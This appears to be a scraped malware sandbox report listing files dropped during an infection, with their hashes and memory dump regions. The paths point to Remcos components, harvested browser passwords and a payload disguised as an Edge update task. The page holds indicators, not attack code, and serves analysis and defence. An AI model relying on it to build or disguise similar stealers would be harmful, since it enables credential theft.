C:\Users\Admin\AppData\Local\Temp\nsl9FD6.tmp\System.dll

Filesize
11KB

MD5
3f176d1ee13b0d7d6bd92e1c7a0b9bae

SHA1
fe582246792774c2c9dd15639ffa0aca90d6fd0b

SHA256
fa4ab1d6f79fd677433a31ada7806373a789d34328da46ccb0449bbf347bd73e

SHA512
0a69124819b7568d0dea4e9e85ce8fe61c7ba697c934e3a95e2dcfb9f252b1d9da7faf8774b6e8efd614885507acc94987733eba09a2f5e7098b774dfc8524b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsp127B.tmp\plbwit.dll

Filesize
86KB

MD5
5b857d95b618168a8ce018f5c4bf5c4b

SHA1
fc7cd742b7dd0110dcd5f5e6f96e637a69b7fd76

SHA256
b801b45414145ceb0e147dc9546fa2e53f39151cd4859599d01b9f6736ad749f

SHA512
6d1c928a93fe80a2859bc5587d8bc9eb6b4789a8730722f22138bb0b5e234287f0b2e84b6f7e5317a2c95ca94e058b05fd3734dadc57c09acf46a2ff0d89a29d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp2A12.tmp.dat

Filesize
92KB

MD5
e93f499f52c3bc7e456a1b5978fc05d5

SHA1
7deaa85ec9fb9401f2010bb0a893635d9a7e02bd

SHA256
8405cf0dbae6930f4add6b7354f71d815919211f8be724292f26e028253e94d2

SHA512
2aa3d1573cc52a1107a9b31fdce074e325130a64e5faa282c7c6b2ca88646013106e39d357710deb90c253e885479ea512d04b2e162a936c58c1e40812af9b31

Download Submit
C:\Users\Admin\AppData\Local\Temp\usadminwbijutsd\Browsers\Firefox\FirefoxBookmarks.txt

Filesize
105B

MD5
2e9d094dda5cdc3ce6519f75943a4ff4

SHA1
5d989b4ac8b699781681fe75ed9ef98191a5096c

SHA256
c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

SHA512
d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\usadminwbijutsd\Browsers\InternetExplorer\IEPasswords.txt

Filesize
431B

MD5
35d790bbcdb56298ca83f79642217f31

SHA1
205201f2f9a509797215dbe136e59bfea4963e02

SHA256
1933795ca45a2c22a1a76bb7db6aca282664782d50d34f418e74a204b3c19968

SHA512
9559ea2f86c9c7a56135388b1532a09713cc4870155c2a688d2ae24933736ec582c676c3cab0943920faa97fa01f0545e5aa3369b704be73aa94bd1fd3c86b39

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

Filesize
89KB

MD5
a5ed103ec4719a27ab3d3c01dac66f01

SHA1
c830d6980d7edea60568a518eccd36c0bc2a4924

SHA256
dbcdc009781edffc3c4e5234d3d23d26364d6bff47e2e384cffdef148d7b5b36

SHA512
b7fbe709a44f0e84a94c9e82f790d04e3d86b5409b5eb2d9f1d4d775b9669694c189042f04001acadb6da4c6284f4fbcbe39fd97427d41619191928510db9d80

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

Filesize
162B

MD5
1b7c22a214949975556626d7217e9a39

SHA1
d01c97e2944166ed23e47e4a62ff471ab8fa031f

SHA256
340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87

SHA512
ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg

Filesize
403KB

MD5
15792c634d9ae41b6dac57e68bb08b4a

SHA1
d03f01eb91d50f343ce9f0adb1a60f6c4a63abb9

SHA256
d01882b9d38a662451c6972fc493873deea1f2fbe07bf439435624c64a3dcba8

SHA512
2a340e958612977f16d1e958970e7f53e7db521024f9f88d5c9f90deb93073d8945c6a72ea0bd0ca279afe5552a15db3486dc7c410bc432c0a567054613fcb7f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\config\MicrosoftEdgeUpdateTaskMachineUARun.exe

Filesize
205.2MB

MD5
721b6ca930dfc35b1ffbcc3b8fec0bb3

SHA1
40ca4d7482dc740280ad67a221a166b383d54c3d

SHA256
8b8b41a8d840bd7961fc2a1ffbdca6a2f0463a25f1bb72ecdb94f3256287f727

SHA512
bb06e86c6c37a8e121d0329b7612bb2c5ef8ddb5941cbe051910b08571840b9c517a3306a5b51bf7e0dca1a620e17f9f757ff66b4a4f57c669d18f7668c1ec15

Download Submit
C:\Users\Admin\AppData\Roaming\remcos\dtas.dat

Filesize
508B

MD5
e1b3881fda59100faf590e200cef52cb

SHA1
d7c007762a41c7c366061a91176e6c357c594efb

SHA256
30eba6d13bcfafd91fa2aa6f8d5825e2a193f535e0b1a5b5d9240c08b10a8b86

SHA512
3322bcb3adfe05f062ee77ef2e514131a14ee3a2daaec4bc05beee51ac7321ab310d66e5350e538b7c0c1975dfadbe409d0626344e5894b2c4121d4c4ca26602

Download Submit
C:\Users\Admin\AppData\Roaming\remcos\dtas.dat

Filesize
734B

MD5
8a6d08717466fb99ab562b6e6a1f6412

SHA1
238cdcc6561b517f81218dfe743a69c0d2a9221a

SHA256
9d9782df4648dc993ed9655d48053c8afd7699b42a1d8f0c964fbbfcb4abe0d7

SHA512
010dbdee505bf7fc563ecc5c255f3b2c1cc0699509db8758d3e3f1a1cba25d41680f90259e640f2fd5ff7382e6cc05726d6bce5fc33f1f21498b7b86ecccc2b2

Download Submit
C:\Users\Admin\AppData\Roaming\remcos\dtas.dat

Filesize
1KB

MD5
7ece5106268dce1e2aa9dfc51dd3e270

SHA1
b79f9d6df52e379412f42973ed6b06400b632f0e

SHA256
044e690c4f37e08500e8c65856a54969a56ec8617789f9416cf9b9ff0cb8dbff

SHA512
18ef49c1440a052ad131009377304b000ea87fa1d82b46c784586d53b5c9a901f6b3531cdd719d79cce7272b28f524a382f202ef6dbd523f380d70442c7817c0

Download Submit
C:\Users\Admin\Videos\Captures\desktop.ini

Filesize
190B

MD5
b0d27eaec71f1cd73b015f5ceeb15f9d

SHA1
62264f8b5c2f5034a1e4143df6e8c787165fbc2f

SHA256
86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2

SHA512
7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c

Download Submit
C:\Users\Public\WindowsApp1.exe

Filesize
112KB

MD5
23d5e4451d06e75a3096a65250bad00b

SHA1
aed599efd69fdb9985c0e60558514e6c451fe329

SHA256
a3551ac295e91fd27d9e8bdb341452bc2aca9a6f9235bd3c4de7e2acf8ea775e

SHA512
d4a41e7a3c2e62ab84af308092dd8a86121908bb87cf510b2b1d91e70726d80666eb26b9407c20c48260999be1c647cdb2bcf8abe9a204e6f1fa762c75bf669d

Download Submit
C:\Windows\System32\GroupPolicy\gpt.ini

Filesize
127B

MD5
8ef9853d1881c5fe4d681bfb31282a01

SHA1
a05609065520e4b4e553784c566430ad9736f19f

SHA256
9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

SHA512
5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Download Submit
memory/204-485-0x0000000000210000-0x000000000021A000-memory.dmp

Filesize
40KB

Download
memory/520-461-0x000000000AE90000-0x000000000B1A6000-memory.dmp

Filesize
3.1MB

Download
memory/520-402-0x0000000000ED0000-0x000000000169E000-memory.dmp

Filesize
7.8MB

Download
memory/520-439-0x000000000A8E0000-0x000000000AE88000-memory.dmp

Filesize
5.7MB

Download
memory/520-415-0x0000000006160000-0x0000000006170000-memory.dmp

Filesize
64KB

Download
memory/1504-289-0x0000000004A70000-0x0000000004B0C000-memory.dmp

Filesize
624KB

Download
memory/1504-417-0x0000000004C20000-0x0000000004C30000-memory.dmp

Filesize
64KB

Download
memory/1504-406-0x0000000004C20000-0x0000000004C30000-memory.dmp

Filesize
64KB

Download
memory/1504-396-0x0000000004930000-0x0000000004948000-memory.dmp

Filesize
96KB

Download
memory/1504-341-0x00000000043E0000-0x000000000442A000-memory.dmp

Filesize
296KB

Download
memory/1504-281-0x0000000000B50000-0x0000000000C36000-memory.dmp

Filesize
920KB

Download
memory/1504-286-0x0000000004F70000-0x000000000546E000-memory.dmp

Filesize
5.0MB

Download
memory/1504-288-0x0000000004950000-0x00000000049E2000-memory.dmp

Filesize
584KB

Download
memory/1504-467-0x0000000004C20000-0x0000000004C30000-memory.dmp

Filesize
64KB

Download
memory/1504-307-0x0000000004C20000-0x0000000004C30000-memory.dmp

Filesize
64KB

Download
memory/1504-294-0x0000000004910000-0x000000000491A000-memory.dmp

Filesize
40KB

Download
memory/1600-554-0x0000000000440000-0x00000000004EE000-memory.dmp

Filesize
696KB

Download
memory/1888-458-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/1888-495-0x00000000055F0000-0x00000000055FA000-memory.dmp

Filesize
40KB

Download
memory/1888-487-0x0000000005620000-0x0000000005630000-memory.dmp

Filesize
64KB

Download
memory/1888-503-0x0000000006190000-0x000000000619A000-memory.dmp

Filesize
40KB

Download
memory/1888-500-0x0000000005600000-0x000000000561E000-memory.dmp

Filesize
120KB

Download
memory/2096-121-0x00000000000E0000-0x00000000000E8000-memory.dmp

Filesize
32KB

Download
memory/2096-287-0x000000001AEE0000-0x000000001AEF0000-memory.dmp

Filesize
64KB

Download
memory/2096-122-0x000000001AEE0000-0x000000001AEF0000-memory.dmp

Filesize
64KB

Download
memory/2172-371-0x000001BDD7B50000-0x000001BDD7B60000-memory.dmp

Filesize
64KB

Download
memory/2172-339-0x000001BDD79E0000-0x000001BDD79E6000-memory.dmp

Filesize
24KB

Download
memory/2172-326-0x000001BDD7630000-0x000001BDD76C4000-memory.dmp

Filesize
592KB

Download
memory/2284-553-0x0000025772D80000-0x0000025772E8D000-memory.dmp

Filesize
1.1MB

Download
memory/2284-519-0x0000000140000000-0x00000001400AA000-memory.dmp

Filesize
680KB

Download
memory/2284-561-0x0000025772D80000-0x0000025772E8D000-memory.dmp

Filesize
1.1MB

Download
memory/2284-568-0x0000025772D80000-0x0000025772E8D000-memory.dmp

Filesize
1.1MB

Download
memory/2284-575-0x0000025772D80000-0x0000025772E8D000-memory.dmp

Filesize
1.1MB

Download
memory/2284-549-0x0000025772D80000-0x0000025772E8D000-memory.dmp

Filesize
1.1MB

Download
memory/2528-475-0x000001AC40BD0000-0x000001AC40C44000-memory.dmp

Filesize
464KB

Download
memory/2652-325-0x000002AC3D5C0000-0x000002AC3D5E2000-memory.dmp

Filesize
136KB

Download
memory/2652-319-0x000002AC3D350000-0x000002AC3D380000-memory.dmp

Filesize
192KB

Download
memory/3132-310-0x000001EE3F6F0000-0x000001EE3F76E000-memory.dmp

Filesize
504KB

Download
memory/3132-324-0x000001EE3F980000-0x000001EE3F98C000-memory.dmp

Filesize
48KB

Download
memory/3132-329-0x000001EE41480000-0x000001EE41490000-memory.dmp

Filesize
64KB

Download
memory/3500-172-0x0000000000120000-0x0000000000150000-memory.dmp

Filesize
192KB

Download
memory/3500-314-0x000000000A9B0000-0x000000000AA16000-memory.dmp

Filesize
408KB

Download
memory/3500-365-0x0000000004A00000-0x0000000004A10000-memory.dmp

Filesize
64KB

Download
memory/3500-223-0x000000000A030000-0x000000000A07B000-memory.dmp

Filesize
300KB

Download
memory/3500-185-0x00000000049D0000-0x00000000049D6000-memory.dmp

Filesize
24KB

Download
memory/3500-306-0x000000000A1D0000-0x000000000A246000-memory.dmp

Filesize
472KB

Download
memory/3500-218-0x0000000009EB0000-0x0000000009EEE000-memory.dmp

Filesize
248KB

Download
memory/3500-214-0x0000000004A00000-0x0000000004A10000-memory.dmp

Filesize
64KB

Download
memory/3500-212-0x0000000009E50000-0x0000000009E62000-memory.dmp

Filesize
72KB

Download
memory/3500-209-0x0000000009F20000-0x000000000A02A000-memory.dmp

Filesize
1.0MB

Download
memory/3500-201-0x000000000A3A0000-0x000000000A9A6000-memory.dmp

Filesize
6.0MB

Download
memory/3704-350-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-327-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-506-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-424-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-378-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-332-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-493-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-336-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-471-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-401-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-457-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-349-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-530-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-331-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-443-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-547-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-361-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-328-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-562-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-481-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-408-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-436-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-427-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-403-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3704-412-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3724-488-0x0000000000400000-0x000000000041E000-memory.dmp

Filesize
120KB

Download
memory/3852-375-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3852-394-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3852-400-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3852-397-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3852-390-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3852-405-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3852-383-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4044-300-0x0000021562EB0000-0x0000021562ED8000-memory.dmp

Filesize
160KB

Download
memory/4044-309-0x0000021564A90000-0x0000021564AA0000-memory.dmp

Filesize
64KB

Download
memory/4260-384-0x00000000007D0000-0x00000000007DA000-memory.dmp

Filesize
40KB

Download
memory/4336-474-0x000001FE57B50000-0x000001FE57BE2000-memory.dmp

Filesize
584KB

Download
memory/4336-395-0x000001FE57560000-0x000001FE578A0000-memory.dmp

Filesize
3.2MB

Download
memory/4336-345-0x000001FE3C250000-0x000001FE3C6EA000-memory.dmp

Filesize
4.6MB

Download
memory/4336-478-0x000001FE56B90000-0x000001FE56BB2000-memory.dmp

Filesize
136KB

Download
memory/4336-368-0x000001FE3CA20000-0x000001FE3CA30000-memory.dmp

Filesize
64KB

Download
memory/4336-409-0x000001FE579A0000-0x000001FE57A4C000-memory.dmp

Filesize
688KB

Download
memory/4652-346-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/4652-334-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/4652-340-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/4652-505-0x0000000000400000-0x0000000000554000-memory.dmp

Filesize
1.3MB

Download
memory/4704-452-0x0000000000C30000-0x0000000000C64000-memory.dmp

Filesize
208KB

Download
memory/4784-190-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/4808-564-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/4876-271-0x0000000008B00000-0x0000000008B10000-memory.dmp

Filesize
64KB

Download
memory/4876-265-0x00000000063A0000-0x00000000063A6000-memory.dmp

Filesize
24KB

Download
memory/4876-233-0x0000000000570000-0x00000000005A0000-memory.dmp

Filesize
192KB

Download
memory/4876-425-0x000000000FFB0000-0x00000000104DC000-memory.dmp

Filesize
5.2MB

Download
memory/4876-422-0x000000000F8B0000-0x000000000FA72000-memory.dmp

Filesize
1.8MB

Download
memory/4876-411-0x0000000008B00000-0x0000000008B10000-memory.dmp

Filesize
64KB

Download
memory/4988-208-0x000002621BEA0000-0x000002621BEA1000-memory.dmp

Filesize
4KB

Download
memory/4988-215-0x000002621BFC0000-0x000002621BFD0000-memory.dmp

Filesize
64KB

Download
memory/5088-447-0x0000017E0F7B0000-0x0000017E0F7BA000-memory.dmp

Filesize
40KB

Download
memory/5088-441-0x0000017E0F3D0000-0x0000017E0F492000-memory.dmp

Filesize
776KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads